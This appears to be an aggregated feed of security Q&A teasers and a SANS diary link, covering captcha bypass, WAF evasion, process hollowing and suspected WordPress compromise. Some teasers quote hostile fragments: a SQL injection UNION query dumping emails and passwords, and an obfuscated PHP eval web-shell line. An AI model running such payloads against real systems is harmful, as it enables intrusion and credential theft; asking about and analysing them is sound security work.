Collaborate Disseminate
Trying some malicious injection against bWAPP and came across bypass captcha
Filter validating captcha is
if($_POST["captcha_user"] == $_SESSION["captcha"])
Tried input 1′ || ‘2 but it doesn’t bypass logical condition… Continue reading Can’t bypass filter
I published the following diary on isc.sans.edu: “PowerShell Backdoor Launched from a ShellCode“: When you need to perform malicious actions on a victim’s computer, the Internet is full of resources that can be reused, forked, slightly changed to meet your requirements. After all, why reinvent the wheel if some pieces
The post [SANS ISC] PowerShell Backdoor Launched from a ShellCode appeared first on /dev/random.
Continue reading [SANS ISC] PowerShell Backdoor Launched from a ShellCode
i have problem some one remove user access from database on server any time i add this user to database on go daddy server he removes it , i tried to change database name and make new user also removed after less than day ,i need to know t… Continue reading i have been hacked from someone register with script
My J2EE application is vulnerable to HTTP header injection attack. I want to make it secure from this vulnerability. Also, I am searching if any library (Maven dependency) available for this.
When I install this plugin and activate in wordpress, hide_my_wp put some eval codes in wp_options and I see the following code being injected in a new row with the ID called 76624:
upload-dir=./../../,z=@eval/**/(${‘_P’.’OST’}[z9]/**/(${‘… Continue reading hide_my_wp wordpress plugin is activated with php eval function that might trying to read /etc/passwd? Is it true?
I am by far not a security expert and I would like to use Airflow, but security is blocking the usage due to vulnerable aspects. When I asked the specifics they directed me to the given one
The Airflow Celery workers deserialize pickle dat… Continue reading Vulnerabilities in Airflow
I’m working on securing an application that receives SQL and HTML-like information that is actually proprietry formulas in some cases, and parts of XML documents in other cases.
So the WAF thinks some HTTP requests are SQL or HTML injectio… Continue reading How to send SQL or HTML data over HTTP without triggering WAF rules?
I have a sqli and i can dump data from the DB with the query below func=REC&lastid=7491&start=3&uid=56+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(uid,’:’,email,’:’,password) FROM user WHERE uid=56; –… Continue reading SQL Injection update query
As title suggests im wondering if a game ,for example, has any business accessing ‘webcache_counters’.
After attempting to clean my webcachev01 file due to its oddly large filesize given the fact i dont use IE or Microsoft Edge at all, I n… Continue reading Unrelated applications like games accessing ‘webcache’ related files
I have been learning and implementing Process Hollowing attacks, and even after I got the thing work, I have some questions.
Why aren’t we building the IAT when we load our injected PE? All we do is copy the headers and the sections, fix … Continue reading Process hollowing and the Import Address Table